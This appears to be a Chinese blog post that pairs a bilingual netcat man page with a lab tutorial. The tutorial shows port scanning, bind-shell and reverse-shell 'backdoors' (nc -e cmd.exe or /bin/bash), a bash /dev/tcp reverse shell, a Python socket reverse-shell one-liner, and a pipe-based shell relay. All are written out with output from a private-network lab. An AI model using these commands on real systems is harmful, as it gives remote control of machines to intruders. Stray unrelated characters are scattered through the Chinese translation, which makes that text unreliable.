后面有一些實(shí)例
"""
NC(1) General Commands Manual 通用命令手冊
NAME
nc - TCP/IP swiss army knife TCP/IP瑞士軍刀
SYNOPSIS 概要
nc [-options] hostname port[s] [ports] ...
nc -l -p port [-options] [hostname] [port]
DESCRIPTION 描述
netcat is a simple unix utility which reads and writes data across net‐
work connections, using TCP or UDP protocol. It is designed to be a re‐
liable "back-end" tool that can be used directly or easily driven by
other programs and scripts. At the same time, it is a feature-rich
network debugging and exploration tool, since it can create almost any
kind of connection you would need and has several interesting built-in
capabilities. Netcat, or "nc" as the actual program is named, should
have been supplied long ago as another one of those cryptic but stan‐
dard Unix tools.
Netcat是一個(gè)簡單的Unix實(shí)用程序裤纹,它使用TCP或UDP協(xié)議跨網(wǎng)絡(luò)連接讀取和寫入數(shù)據(jù)委刘。
它被設(shè)計(jì)成一個(gè)可靠的“后端”工具丧没,可以直接使用,也可以很容易地由其他程序和腳本驅(qū)動(dòng)锡移。
同時(shí)它是一個(gè)功能豐富的網(wǎng)絡(luò)調(diào)試和探索工具呕童,因?yàn)樗梢詣?chuàng)建您需要的幾乎任何類型的連接,
并且具有幾個(gè)有趣的內(nèi)置功能淆珊。Netcat夺饲,或?qū)嶋H程序名為“NC”,
早就應(yīng)該作為另一種神秘但標(biāo)準(zhǔn)的Unix工具提供施符。
In the simplest usage, "nc host port" creates a TCP connection to the
given port on the given target host. Your standard input is then sent
to the host, and anything that comes back across the connection is sent
to your standard output. This continues indefinitely, until the net‐
work side of the connection shuts down. Note that this behavior is
different from most other applications which shut everything down and
exit after an end-of-file on the standard input.
在最簡單的用法中往声,“nc host port”創(chuàng)建到給定目標(biāo)主機(jī)上給定端口的TCP連接。
然后將標(biāo)準(zhǔn)輸入發(fā)送到主機(jī)戳吝,并且通過連接返回的任何內(nèi)容都將發(fā)送到標(biāo)準(zhǔn)輸出浩销。
這將無限期地持續(xù)下去,直到連接的網(wǎng)絡(luò)端關(guān)閉听哭。請(qǐng)注意慢洋,此行為與大多數(shù)其他應(yīng)用程序不同,
這些應(yīng)用程序在標(biāo)準(zhǔn)輸入的文件結(jié)束后關(guān)閉所有內(nèi)容并退出陆盘。
Netcat can also function as a server, by listening for inbound connec‐
tions on arbitrary ports and then doing the same reading and writing.
With minor limitations, netcat doesn't really care if it runs in
"client" or "server" mode -- it still shovels data back and forth until
there isn't any more left. In either mode, shutdown can be forced after
a configurable time of inactivity on the network side.
Netcat還可以充當(dāng)服務(wù)器普筹,通過偵聽任意端口上的入站連接,然后進(jìn)行相同的讀取和寫入礁遣。
由于有一些小的限制斑芜,Netcat并不真正關(guān)心它是在“客戶端”模式還是“服務(wù)器”模式下運(yùn)行——
它仍然來回推送數(shù)據(jù),直到?jīng)]有更多的數(shù)據(jù)留下祟霍。
在任一模式下杏头,都可以在網(wǎng)絡(luò)側(cè)可配置的不活動(dòng)時(shí)間后強(qiáng)制關(guān)機(jī)。
And it can do this via UDP too, so netcat is possibly the "udp telnet-
like" application you always wanted for testing your UDP-mode servers.
UDP, as the "U" implies, gives less reliable data transmission than TCP
connections and some systems may have trouble sending large amounts of
data that way, but it's still a useful capability to have.
而且它也可以通過UDP做到這一點(diǎn)沸呐,所以Netcat可能是您一直希望用于測試UDP模式服務(wù)器
的“UDP telnetlike”應(yīng)用程序醇王。
正如“U”所示,UDP提供的數(shù)據(jù)傳輸不如TCP連接可靠崭添,一些系統(tǒng)可能無法以這種方式發(fā)送
大量數(shù)據(jù)寓娩,但它仍然是一種有用的功能。
You may be asking "why not just use telnet to connect to arbitrary
ports?" Valid question, and here are some reasons. Telnet has the
"standard input EOF" problem, so one must introduce calculated delays
in driving scripts to allow network output to finish. This is the main
reason netcat stays running until the *network* side closes. Telnet
also will not transfer arbitrary binary data, because certain charac‐
ters are interpreted as telnet options and are thus removed from the
data stream. Telnet also emits some of its diagnostic messages to
standard output, where netcat keeps such things religiously separated
from its *output* and will never modify any of the real data in transit
unless you *really* want it to. And of course telnet is incapable of
listening for inbound connections, or using UDP instead. Netcat
doesn't have any of these limitations, is much smaller and faster than
telnet, and has many other advantages.
您可能會(huì)問“為什么不直接使用telnet連接到任意端口呼渣?”有效的問題棘伴,這里有一些原因。
Telnet存在“標(biāo)準(zhǔn)輸入EOF”問題屁置,因此必須在驅(qū)動(dòng)腳本中引入計(jì)算延遲焊夸,以便完成網(wǎng)絡(luò)輸出。
這是Netcat保持運(yùn)行直到*network*端關(guān)閉的主要原因蓝角。Telnet也不會(huì)傳輸任意二進(jìn)制數(shù)據(jù)阱穗,
因?yàn)槟承┳址唤忉尀閠elnet選項(xiàng)饭冬,因此會(huì)從數(shù)據(jù)流中刪除。Telnet還會(huì)將一些診斷消息
發(fā)送到標(biāo)準(zhǔn)輸出揪阶,在標(biāo)準(zhǔn)輸出中昌抠,Netcat會(huì)將這些信息與其*輸出*嚴(yán)格分開,并且除非
您*真的*想要修改鲁僚,否則永遠(yuǎn)不會(huì)修改傳輸中的任何真實(shí)數(shù)據(jù)炊苫。當(dāng)然,telnet不能偵聽入站連接冰沙,
也不能使用UDP劝评。Netcat沒有任何這些限制,它比telnet小得多倦淀,速度也快得多蒋畜,還有很多其他優(yōu)勢。
OPTIONS
-c string specify shell commands to exec after connect (use with
字符串 caution). The string is passed to /bin/sh -c for execu‐
tion. See the -e option if you don't have a working
/bin/sh (Note that POSIX-conformant system must have one).
在連接后指定要執(zhí)行的shell命令(謹(jǐn)慎使用)撞叽。 該字符串將傳遞給
/bin/sh -c以供執(zhí)行姻成。 如果沒有工作/bin/sh,請(qǐng)參閱-e選項(xiàng)
(請(qǐng)注意愿棋,符合POSIX的系統(tǒng)必須具有一個(gè))科展。
-e filename specify filename to exec after connect (use with caution).
文件名 See the -c option for enhanced functionality.
filename指定連接后exec的文件名(請(qǐng)謹(jǐn)慎使用)。有關(guān)增強(qiáng)功能糠雨,請(qǐng)參閱-c選項(xiàng)才睹。
-g gateway source-routing hop point[s], up to 8
網(wǎng)關(guān) 源路由跳躍點(diǎn)[s],最多8個(gè)
-G num source-routing pointer: 4, 8, 12, ...
數(shù)字 源路由指針
-h display help
顯示幫助
-i secs delay interval for lines sent, ports scanned
秒 發(fā)送每一行數(shù)據(jù)或端口掃描的延遲間隔
-l listen mode, for inbound connects
-L 可以在客戶端結(jié)束連接的時(shí)候繼續(xù)監(jiān)聽
監(jiān)聽模式甘邀,用于入站連接
-n numeric-only IP addresses, no DNS
僅限數(shù)字的IP地址琅攘,沒有DNS
-o file hex dump of traffic 十六進(jìn)制展示
-p port local port number (port numbers can be individual or
ranges: lo-hi [inclusive])
本地端口號(hào)(端口號(hào)可以是單個(gè)的或范圍:lo-hi [包含])
-q seconds after EOF on stdin, wait the specified number of seconds
秒 and then quit. If seconds is negative, wait forever.
在標(biāo)準(zhǔn)輸入上執(zhí)行EOF后,等待指定的秒數(shù)然后退出松邪。 如果秒是負(fù)數(shù)坞琴,則永遠(yuǎn)等待。
-b allow UDP broadcasts 允許UDP廣播
-r randomize local and remote ports 隨機(jī)化本地和遠(yuǎn)程端口逗抑,隨便開的端口監(jiān)聽吧
-s addr local source address 本地源地址剧辐,用來欺騙
-t enable telnet negotiation 啟用telnet協(xié)商
-u UDP mode UDP模式
-v verbose [use twice to be more verbose] 詳細(xì)[使用兩次更詳細(xì)]
-w secs timeout for connects and final net reads 連接超時(shí)和最終網(wǎng)絡(luò)讀取
-C Send CRLF as line-ending 將CRLF作為行尾發(fā)送
-z zero-I/O mode [used for scanning] 零I / O模式[用于掃描]
-T type set TOS flag (type may be one of "Minimize-Delay", "Maxi‐
mize-Throughput", "Maximize-Reliability", or "Minimize-
Cost".)
設(shè)置TOS標(biāo)志(類型可以是“最小化延遲”,“最大化吞吐量”邮府,
“最大化可靠性”或“最小化成本”之一荧关。)
COPYRIGHT 版權(quán)
Netcat is entirely my own creation, although plenty of other code was
used as examples. It is freely given away to the Internet community in
the hope that it will be useful, with no restrictions except giving
credit where it is due. No GPLs, Berkeley copyrights or any of that
nonsense. The author assumes NO responsibility for how anyone uses it.
If netcat makes you rich somehow and you're feeling generous, mail me a
check. If you are affiliated in any way with Microsoft Network, get a
life. Always ski in control. Comments, questions, and patches to hob‐
bit@avian.org.
盡管使用了大量其他代碼作為示例,但Netcat完全是我自己的創(chuàng)建褂傀。
它是免費(fèi)贈(zèng)送給互聯(lián)網(wǎng)社區(qū)的忍啤,希望它有用,沒有任何限制紊服,除非給予應(yīng)有的信用檀轨。
沒有GPL,伯克利版權(quán)或任何廢話欺嗤。 作者對(duì)任何人使用它不承擔(dān)任何責(zé)任参萄。
如果netcat以某種方式使你富有并且你很慷慨,請(qǐng)給我發(fā)一張支票煎饼。
如果您以任何方式加入Microsoft Network獲得生命讹挎。 總是控制滑雪。
hobbit@avian.org的評(píng)論吆玖,問題和補(bǔ)丁筒溃。
NOTES 筆記
Some port names in /etc/services contain hyphens -- netcat currently
will not correctly parse those unless you escape the hyphens with back‐
slashes (e.g. "netcat localhost 'ftp\-data'").
/etc/services中的某些端口名稱包含連字符 - 除非您使用反斜杠轉(zhuǎn)義連字符
(例如“netcat localhost'ftp \-data'”),否則netcat當(dāng)前將無法正確解析這些連字符沾乘。
BUGS
Efforts have been made to have netcat "do the right thing" in all its
various modes. If you believe that it is doing the wrong thing under
whatever circumstances, please notify me and tell me how you think it
should behave. If netcat is not able to do some task you think up, mi‐
nor tweaks to the code will probably fix that. It provides a basic and
easily-modified template for writing other network applications, and I
certainly encourage people to make custom mods and send in any improve‐
ments they make to it. Continued feedback from the Internet community
is always welcome!
EXAMPLES
For several netcat recipes, please see /usr/share/doc/netcat/README.gz
and /usr/share/doc/netcat/README.Debian.gz.
AUTHOR
This manual page was written by Joey Hess <joeyh@debian.org> and Robert
Woodcock <rcw@debian.org>, cribbing heavily from Netcat's README file.
Netcat was written by a guy we know as the Hobbit <hobbit@avian.org>.
NC(1)
下載地址:https://eternallybored.org/misc/netcat/
附上一些simple(windows-64):
- 開啟服務(wù)端:
打開一個(gè)窗口
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444
(同意防火墻選項(xiàng))這個(gè)時(shí)候服務(wù)的已經(jīng)開啟了
- 連接到服務(wù)端
然后再打開一個(gè)窗口輸入
# 請(qǐng)以自己的ip為準(zhǔn)
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444
這個(gè)時(shí)候雖然沒有回顯和提示但是已經(jīng)連接成功了怜奖,隨便輸入點(diǎn)東西
客戶端發(fā)的消息會(huì)被服務(wù)端輸出,服務(wù)端發(fā)送的消息會(huì)被客戶端輸出
- 開啟一個(gè)shell服務(wù)端
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444 -e cmd.exe
- 連接上去
sanqiushu@DESKTOP-343EN6M:~$ nc 10.20.3.129 4444
Microsoft Windows [汾 10.0.17134.885]
(c) 2018 Microsoft Corporation?
F:\SecTools\apps\netcat-win32-1.12>
連接上去之后直接返回了一個(gè)命令行(為了換個(gè)路徑翅阵,我使用了linux版的nc)
F:\SecTools\apps\netcat-win32-1.12>dir
dir
F е? ?
к 1646-F9AD
F:\SecTools\apps\netcat-win32-1.12 ??
2019/08/14 15:08 <DIR> .
2019/08/14 15:08 <DIR> ..
2004/12/28 12:23 12,166 doexec.c
1996/07/09 17:01 7,283 generic.h
1996/11/06 23:40 22,784 getopt.c
1994/11/03 20:07 4,765 getopt.h
1998/02/06 16:50 61,780 hobbit.txt
2004/12/27 18:37 18,009 license.txt
2011/09/17 00:46 300 Makefile
2019/08/14 14:42 4 nc.bat
2011/09/17 00:52 38,616 nc.exe
2011/09/17 00:52 45,272 nc64.exe
2011/09/17 00:44 69,850 netcat.c
2011/09/17 00:45 6,885 readme.txt
12 ? 287,714 ?
2 ?? 199,469,047,808 ?
F:\SecTools\apps\netcat-win32-1.12>
可以直接執(zhí)行命令(但是這中文亂碼很頭疼)看來以后還是windows連windows歪玲,linux連linux吧
- 傳輸文件
服務(wù)端接受文件
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444 >F:\SecTools\apps\netcat-win32-1.12\readme2.txt
客戶端發(fā)送文件
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444 < F:\SecTools\apps\netcat-win32-1.12\readme.txt
雖然兩邊都沒啥反應(yīng),但是傳輸已經(jīng)完成了
為什么windows的要用絕對(duì)路徑啊
linux發(fā)送端好像也要絕對(duì)路徑掷匠?滥崩??
客戶端接收文件
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444 > F:\SecTools\apps\netcat-win32-1.12\readme3.txt
服務(wù)器端發(fā)送文件
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444 < F:\SecTools\apps\netcat-win32-1.12\readme.txt
可以使用-w5 這樣的參數(shù)設(shè)置等待時(shí)間讹语,如果網(wǎng)絡(luò)延遲超過5s還沒連接好钙皮,那么結(jié)束命令
image.png
這個(gè)掃描端口windows版nc的掃描速度真是絕了,掃完感覺人都涼了
ubuntu上的也不行
但是kali-linux上的nc就非常厲害了
root@Sanqiushu:~# nc -z -v -n 10.20.7.7 1-65535
(UNKNOWN) [10.20.7.7] 8080 (http-alt) open
(UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
(UNKNOWN) [10.20.7.7] 22 (ssh) open
root@Sanqiushu:~#
掃描一次全端口竟然沒用2分鐘
image.png
root@Sanqiushu:~# echo "" | nc -v -n 10.20.7.7 1-65535
(UNKNOWN) [10.20.7.7] 8080 (http-alt) open
(UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
(UNKNOWN) [10.20.7.7] 22 (ssh) open
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
Protocol mismatch.
root@Sanqiushu:~#
有些服務(wù)不回復(fù)banner信息
- 建立監(jiān)聽型后門
F:\SecTools\apps\netcat-win32-1.12>nc -l -p 4444 -e cmd.exe
- 建立連接型后門(反彈型)
自己服務(wù)端開啟監(jiān)聽
F:\SecTools\apps\netcat-win32-1.12>nc -l -p 4444
客戶端連接
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444 -e cmd.exe
客戶端連接上去以后顽决,服務(wù)端拿到了命令行終端
Microsoft Windows [版本 10.0.17134.885]
(c) 2018 Microsoft Corporation短条。保留所有權(quán)利。
F:\SecTools\apps\netcat-win32-1.12>
image.png
windows端開啟服務(wù)
F:\SecTools\apps\netcat-win32-1.12>nc -l -p 4444
kali連接
root@Sanqiushu:~# nc 10.20.3.129 4444 -e /bin/bash
雖然沒啥返回才菠,但是已經(jīng)返回shell了慌烧,可以直接運(yùn)行命令(輸入錯(cuò)誤的命令你這邊是看不到提示的,真是奇怪)鸠儿,有些linux的nc是沒有-e選項(xiàng)的比如ubuntu
使用 -d 參數(shù)讓nc在后臺(tái)運(yùn)行
-
端口轉(zhuǎn)發(fā)
A想連接C屹蚊,但直接連接是不行的,然后使用B進(jìn)行轉(zhuǎn)發(fā)
image.png
image.png
-
無nc的linux機(jī)器反彈bash shell
kali開啟nc服務(wù)端(防火墻關(guān)了)
root@Sanqiushu:~# nc -lvp 4444
listening on [any] 4444 ...
然后Ubuntu輸入命令
sanqiushu@sanqiushu-VirtualBox:~$ bash -i >& /dev/tcp/10.20.2.185/4444 0>&1
kali就接收到了shell
root@Sanqiushu:~# nc -lvp 4444
listening on [any] 4444 ...
10.20.7.7: inverse host lookup failed: Unknown host
connect to [10.20.2.185] from (UNKNOWN) [10.20.7.7] 35130
sanqiushu@sanqiushu-VirtualBox:~$ ls
ls
vulhub
公共的
模板
視頻
圖片
文檔
下載
音樂
桌面
sanqiushu@sanqiushu-VirtualBox:~$
image.png
-
無nc的linux機(jī)器建立python shell
kali建立nc服務(wù)端
root@Sanqiushu:~# nc -lvp 4444
listening on [any] 4444 ...
Ubuntu建立python客戶端
sanqiushu@sanqiushu-VirtualBox:~$ python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.20.2.185',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
kali接受到信息
10.20.7.7: inverse host lookup failed: Unknown host
connect to [10.20.2.185] from (UNKNOWN) [10.20.7.7] 35144
sanqiushu@sanqiushu-VirtualBox:~$ ls
vulhub
公共的
模板
視頻
圖片
文檔
下載
音樂
桌面
sanqiushu@sanqiushu-VirtualBox:~$
python2代碼
import os,socket,subprocess
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.20.2.185',4444)) # 建立一個(gè)遠(yuǎn)程連接s ip和端口按需修改
os.dup2(s.fileno(),0) # 把輸入重定向到s的文件描述符
os.dup2(s.fileno(),1) # 把輸出重定向到s的文件描述符
os.dup2(s.fileno(),2) # 把錯(cuò)誤輸出重定向到s的文件描述符
p=subprocess.call(['/bin/bash','-i'])
之后再用python代碼創(chuàng)建一個(gè)交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
-
不支持-e選項(xiàng)的nc 反彈shell
nc 10.20.2.185 4444 | /bin/bash | nc 10.20.2.185 4445
image.png
比較慢进每,大概等了10s
